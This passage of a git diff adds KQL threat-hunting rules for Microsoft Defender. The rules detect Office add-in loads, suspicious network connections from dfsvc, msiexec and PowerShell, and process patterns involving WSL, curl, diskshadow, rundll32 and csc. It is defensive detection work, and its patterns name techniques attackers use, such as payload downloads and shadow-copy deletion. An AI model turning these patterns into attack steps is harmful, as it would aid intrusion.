+| where FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/microsoft_word_add_in_loaded.kql b/KQL/rules-threat-hunting/windows/image_load/microsoft_word_add_in_loaded.kql
new file mode 100644
index 00000000..c9e3405a
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/microsoft_word_add_in_loaded.kql
@@ -0,0 +1,12 @@
+// Title: Microsoft Word Add-In Loaded
+// Author: Steffen Rogge (dr0pd34d)
+// Date: 2024-07-10
+// Level: low
+// Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002, detection.threat-hunting
+// False Positives:
+//   - The rules is only looking for ".wll" loads. So some false positives are expected with legitimate and allowed WLLs.
+
+DeviceImageLoadEvents
+| where FolderPath endswith ".wll" and InitiatingProcessFolderPath endswith "\\winword.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/system_drawing_dll_load.kql b/KQL/rules-threat-hunting/windows/image_load/system_drawing_dll_load.kql
new file mode 100644
index 00000000..6a9853bb
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/system_drawing_dll_load.kql
@@ -0,0 +1,12 @@
+// Title: System Drawing DLL Load
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: low
+// Description: Detects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1113, detection.threat-hunting
+// False Positives:
+//   - False positives are very common from system and third party applications, activity needs to be investigated. This rule is best correlated with other events to increase the level of suspiciousness
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\System.Drawing.ni.dll"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql b/KQL/rules-threat-hunting/windows/image_load/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
new file mode 100644
index 00000000..8e46c493
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql
@@ -0,0 +1,14 @@
+// Title: Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-09-02
+// Level: low
+// Description: Detects the loading of the "taskschd.dll" module from a process that located in a potentially suspicious or uncommon directory.
+// The loading of this DLL might indicate that the application have the capability to create a scheduled task via the "Schedule.Service" COM object.
+// Investigation of the loading application and its behavior is required to determining if its malicious.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
+// False Positives:
+//   - Some installers might generate false positives, apply additional filters accordingly.
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\taskschd.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "taskschd.dll") and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Desktop\\" or InitiatingProcessFolderPath contains "\\Downloads\\")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/image_load/wmi_module_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/wmi_module_loaded_by_uncommon_process.kql
new file mode 100644
index 00000000..744926a2
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/image_load/wmi_module_loaded_by_uncommon_process.kql
@@ -0,0 +1,10 @@
+// Title: WMI Module Loaded By Uncommon Process
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-10
+// Level: low
+// Description: Detects WMI modules being loaded by an uncommon process
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, detection.threat-hunting
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\WmiApRpl.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\WMINet_Utils.dll" or FolderPath endswith "\\wmiprov.dll" or FolderPath endswith "\\wmiutils.dll") and (not((InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) and (not((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or (InitiatingProcessFolderPath endswith "\\WindowsAzureGuestAgent.exe" or InitiatingProcessFolderPath endswith "\\WaAppAgent.exe") or (InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\Sysmon64.exe") or (InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\current\\Teams.exe" or InitiatingProcessFolderPath contains "\\Microsoft\\Teams\\Update.exe") or (InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/network_connection/dfsvc_exe_network_connection_to_non_local_ips.kql b/KQL/rules-threat-hunting/windows/network_connection/dfsvc_exe_network_connection_to_non_local_ips.kql
new file mode 100644
index 00000000..ed3e79aa
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/network_connection/dfsvc_exe_network_connection_to_non_local_ips.kql
@@ -0,0 +1,12 @@
+// Title: Dfsvc.EXE Network Connection To Non-Local IPs
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203, detection.threat-hunting
+// False Positives:
+//   - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\dfsvc.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/network_connection/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql b/KQL/rules-threat-hunting/windows/network_connection/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
new file mode 100644
index 00000000..ef3c52e4
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/network_connection/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql
@@ -0,0 +1,14 @@
+// Title: Dllhost.EXE Initiated Network Connection To Non-Local IP Address
+// Author: bartblaze
+// Date: 2020-07-13
+// Level: medium
+// Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address.
+// Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL.
+// An initial baseline is recommended before deployment.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, attack.t1559.001, detection.threat-hunting
+// False Positives:
+//   - Communication to other corporate systems that use IP addresses from public address spaces
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "150.171.0.0/19") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/network_connection/hh_exe_initiated_http_network_connection.kql b/KQL/rules-threat-hunting/windows/network_connection/hh_exe_initiated_http_network_connection.kql
new file mode 100644
index 00000000..e24a39ac
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/network_connection/hh_exe_initiated_http_network_connection.kql
@@ -0,0 +1,12 @@
+// Title: HH.EXE Initiated HTTP Network Connection
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-05
+// Level: medium
+// Description: Detects a network connection initiated by the "hh.exe" process to HTTP destination ports, which could indicate the execution/download of remotely hosted .chm files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.001, detection.threat-hunting
+// False Positives:
+//   - False positive is expected from launching "hh.exe" for the first time on a machine in a while or simply from help files containing reference to external sources. Best correlate this with process creation and file events.
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\hh.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/network_connection/msiexec_exe_initiated_network_connection_over_http.kql b/KQL/rules-threat-hunting/windows/network_connection/msiexec_exe_initiated_network_connection_over_http.kql
new file mode 100644
index 00000000..d1b38a88
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/network_connection/msiexec_exe_initiated_network_connection_over_http.kql
@@ -0,0 +1,14 @@
+// Title: Msiexec.EXE Initiated Network Connection Over HTTP
+// Author: frack113
+// Date: 2022-01-16
+// Level: low
+// Description: Detects a network connection initiated by an "Msiexec.exe" process over port 80 or 443.
+// Adversaries might abuse "msiexec.exe" to install and execute remotely hosted packages.
+// Use this rule to hunt for potentially anomalous or suspicious communications.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.007, detection.threat-hunting
+// False Positives:
+//   - Likely
+
+DeviceNetworkEvents
+| where (RemotePort in~ ("80", "443")) and InitiatingProcessFolderPath endswith "\\msiexec.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_by_powershell_process.kql b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_by_powershell_process.kql
new file mode 100644
index 00000000..c043cfa7
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_by_powershell_process.kql
@@ -0,0 +1,16 @@
+// Title: Network Connection Initiated By PowerShell Process
+// Author: Florian Roth (Nextron Systems)
+// Date: 2017-03-13
+// Level: low
+// Description: Detects a network connection that was initiated from a PowerShell process.
+// Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs.
+// Use this rule as a basis for hunting for anomalies.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.threat-hunting
+// False Positives:
+//   - Administrative scripts
+//   - Microsoft IP range
+//   - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range')
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (not((((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "51.103.210.0/23")))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_from_users_public_folder.kql b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_from_users_public_folder.kql
new file mode 100644
index 00000000..8f4d2604
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_from_users_public_folder.kql
@@ -0,0 +1,14 @@
+// Title: Network Connection Initiated From Users\Public Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2024-05-31
+// Level: medium
+// Description: Detects a network connection initiated from a process located in the "C:\Users\Public" folder.
+// Attacker are known to drop their malicious payloads and malware in this directory as its writable by everyone.
+// Use this rule to hunt for potential suspicious or uncommon activity in your environement.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
+// False Positives:
+//   - Likely from legitimate third party application that execute from the "Public" directory.
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath contains ":\\Users\\Public\\" and (not(InitiatingProcessFolderPath contains ":\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/network_connection/potentially_suspicious_azure_front_door_connection.kql b/KQL/rules-threat-hunting/windows/network_connection/potentially_suspicious_azure_front_door_connection.kql
new file mode 100644
index 00000000..3315f64c
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/network_connection/potentially_suspicious_azure_front_door_connection.kql
@@ -0,0 +1,14 @@
+// Title: Potentially Suspicious Azure Front Door Connection
+// Author: Isaac Dunham
+// Date: 2024-11-07
+// Level: medium
+// Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2)
+// that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1102.002, attack.t1090.004, detection.threat-hunting
+// False Positives:
+//   - Results are not inherently suspicious, but should be investigated during threat hunting for potential cloud C2.
+//   - Organization-specific Azure Front Door endpoints
+
+DeviceNetworkEvents
+| where RemoteUrl contains "azurefd.net" and (not((InitiatingProcessFolderPath endswith "searchapp.exe" or (RemoteUrl contains "afdxtest.z01.azurefd.net" or RemoteUrl contains "fp-afd.azurefd.net" or RemoteUrl contains "fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net" or RemoteUrl contains "roxy.azurefd.net" or RemoteUrl contains "powershellinfraartifacts-gkhedzdeaghdezhr.z01.azurefd.net" or RemoteUrl contains "storage-explorer-publishing-feapcgfgbzc2cjek.b01.azurefd.net" or RemoteUrl contains "graph.azurefd.net") or (InitiatingProcessFolderPath endswith "brave.exe" or InitiatingProcessFolderPath endswith "chrome.exe" or InitiatingProcessFolderPath endswith "chromium.exe" or InitiatingProcessFolderPath endswith "firefox.exe" or InitiatingProcessFolderPath endswith "msedge.exe" or InitiatingProcessFolderPath endswith "msedgewebview2.exe" or InitiatingProcessFolderPath endswith "opera.exe" or InitiatingProcessFolderPath endswith "vivaldi.exe"))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/arbitrary_command_execution_using_wsl.kql b/KQL/rules-threat-hunting/windows/process_creation/arbitrary_command_execution_using_wsl.kql
new file mode 100644
index 00000000..2bba25c8
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/arbitrary_command_execution_using_wsl.kql
@@ -0,0 +1,13 @@
+// Title: Arbitrary Command Execution Using WSL
+// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, detection.threat-hunting
+// False Positives:
+//   - Automation and orchestration scripts may use this method to execute scripts etc.
+//   - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server)
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/cab_file_extraction_via_wusa_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/cab_file_extraction_via_wusa_exe.kql
new file mode 100644
index 00000000..a13e52d1
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/cab_file_extraction_via_wusa_exe.kql
@@ -0,0 +1,12 @@
+// Title: Cab File Extraction Via Wusa.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-04
+// Level: medium
+// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+//   - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/clickonce_deployment_execution_dfsvc_exe_child_process.kql b/KQL/rules-threat-hunting/windows/process_creation/clickonce_deployment_execution_dfsvc_exe_child_process.kql
new file mode 100644
index 00000000..b2007261
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/clickonce_deployment_execution_dfsvc_exe_child_process.kql
@@ -0,0 +1,12 @@
+// Title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+//   - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\AppData\\Local\\Apps\\2.0\\" and InitiatingProcessFolderPath endswith "\\dfsvc.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/cmd_shell_output_redirect.kql b/KQL/rules-threat-hunting/windows/process_creation/cmd_shell_output_redirect.kql
new file mode 100644
index 00000000..291edba0
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/cmd_shell_output_redirect.kql
@@ -0,0 +1,13 @@
+// Title: CMD Shell Output Redirect
+// Author: frack113
+// Date: 2022-01-22
+// Level: low
+// Description: Detects the use of the redirection character ">" to redirect information on the command line.
+// This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082, detection.threat-hunting
+// False Positives:
+//   - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains ">" and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")) and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\Internet Download Manager\\IDMMsgHost.exe" or ProcessCommandLine contains "chrome-extension://" or ProcessCommandLine contains "\\.\\pipe\\chrome.nativeMessaging")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/codepage_modification_via_mode_com.kql b/KQL/rules-threat-hunting/windows/process_creation/codepage_modification_via_mode_com.kql
new file mode 100644
index 00000000..8ae99b14
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/codepage_modification_via_mode_com.kql
@@ -0,0 +1,11 @@
+// Title: CodePage Modification Via MODE.COM
+// Author: Nasreddine Bencherchali (Nextron Systems), Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-19
+// Level: low
+// Description: Detects a CodePage modification using the "mode.com" utility.
+// This behavior has been used by threat actors behind Dharma ransomware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, detection.threat-hunting
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution.kql
new file mode 100644
index 00000000..07bf3686
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution.kql
@@ -0,0 +1,13 @@
+// Title: Curl.EXE Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-05
+// Level: low
+// Description: Detects a curl process start on Windows, which could indicates a file download from a remote location or a simple web request to a remote server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105, detection.threat-hunting
+// False Positives:
+//   - Scripts created by developers and admins
+//   - Administrative activity
+
+DeviceProcessEvents
+| where FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution_with_custom_useragent.kql b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution_with_custom_useragent.kql
new file mode 100644
index 00000000..0a262283
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution_with_custom_useragent.kql
@@ -0,0 +1,13 @@
+// Title: Curl.EXE Execution With Custom UserAgent
+// Author: frack113
+// Date: 2022-01-23
+// Level: medium
+// Description: Detects execution of curl.exe with custom useragent options
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1071.001, detection.threat-hunting
+// False Positives:
+//   - Scripts created by developers and admins
+//   - Administrative activity
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable") and (ProcessCommandLine contains " -A " or ProcessCommandLine contains " --user-agent ")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/diskshadow_child_process_spawned.kql b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_child_process_spawned.kql
new file mode 100644
index 00000000..a158ba7a
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_child_process_spawned.kql
@@ -0,0 +1,12 @@
+// Title: Diskshadow Child Process Spawned
+// Author: Harjot Singh @cyb3rjy0t
+// Date: 2023-09-15
+// Level: medium
+// Description: Detects any child process spawning from "Diskshadow.exe". This could be due to executing Diskshadow in interpreter mode or script mode and using the "exec" flag to launch other applications.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting
+// False Positives:
+//   - Likely from legitimate usage of Diskshadow in Interpreter mode.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\diskshadow.exe" and (not(FolderPath endswith ":\\Windows\\System32\\WerFault.exe"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/diskshadow_script_mode_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_script_mode_execution.kql
new file mode 100644
index 00000000..264c2921
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_script_mode_execution.kql
@@ -0,0 +1,12 @@
+// Title: Diskshadow Script Mode Execution
+// Author: Ivan Dyachkov, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag. Attackers often abuse "diskshadow" to execute scripts that deleted the shadow copies on the systems. Investigate the content of the scripts and its location.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution, detection.threat-hunting
+// False Positives:
+//   - Likely from legitimate backup scripts
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/dll_call_by_ordinal_via_rundll32_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/dll_call_by_ordinal_via_rundll32_exe.kql
new file mode 100644
index 00000000..b3b28d98
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/dll_call_by_ordinal_via_rundll32_exe.kql
@@ -0,0 +1,13 @@
+// Title: DLL Call by Ordinal Via Rundll32.EXE
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-22
+// Level: medium
+// Description: Detects calls of DLLs exports by ordinal numbers via rundll32.dll.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.threat-hunting
+// False Positives:
+//   - False positives depend on scripts and administrative tools used in the monitored environment.
+//   - Windows control panel elements have been identified as source (mmc).
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ",#" or ProcessCommandLine contains ", #" or ProcessCommandLine contains ".dll #" or ProcessCommandLine contains ".ocx #") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not(((ProcessCommandLine contains "EDGEHTML.dll" and ProcessCommandLine contains "#141") or ((ProcessCommandLine contains "\\FileTracker32.dll,#1" or ProcessCommandLine contains "\\FileTracker32.dll\",#1" or ProcessCommandLine contains "\\FileTracker64.dll,#1" or ProcessCommandLine contains "\\FileTracker64.dll\",#1") and (InitiatingProcessFolderPath contains "\\Msbuild\\Current\\Bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\MSVC\\" or InitiatingProcessFolderPath contains "\\Tracker.exe")))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/dynamic_net_compilation_via_csc_exe_hunting.kql b/KQL/rules-threat-hunting/windows/process_creation/dynamic_net_compilation_via_csc_exe_hunting.kql
new file mode 100644
index 00000000..913435b7
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/dynamic_net_compilation_via_csc_exe_hunting.kql
@@ -0,0 +1,12 @@
+// Title: Dynamic .NET Compilation Via Csc.EXE - Hunting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-02
+// Level: medium
+// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.004, detection.threat-hunting
+// False Positives:
+//   - Many legitimate applications make use of dynamic compilation. Use this rule to hunt for anomalies
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/noconfig /fullpaths @" and FolderPath endswith "\\csc.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/elevated_system_shell_spawned.kql b/KQL/rules-threat-hunting/windows/process_creation/elevated_system_shell_spawned.kql
new file mode 100644
index 00000000..3685b3c2
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/elevated_system_shell_spawned.kql
@@ -0,0 +1,10 @@
+// Title: Elevated System Shell Spawned
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2023-11-23
+// Level: medium
+// Description: Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges. Use this rule to hunt for potential suspicious processes.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.execution, attack.t1059, detection.threat-hunting
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "powershell_ise.EXE", "pwsh.dll", "Cmd.Exe"))) and (LogonId =~ "0x3e7" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/eventlog_query_requests_by_builtin_utilities.kql b/KQL/rules-threat-hunting/windows/process_creation/eventlog_query_requests_by_builtin_utilities.kql
new file mode 100644
index 00000000..30269d98
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/eventlog_query_requests_by_builtin_utilities.kql
@@ -0,0 +1,12 @@
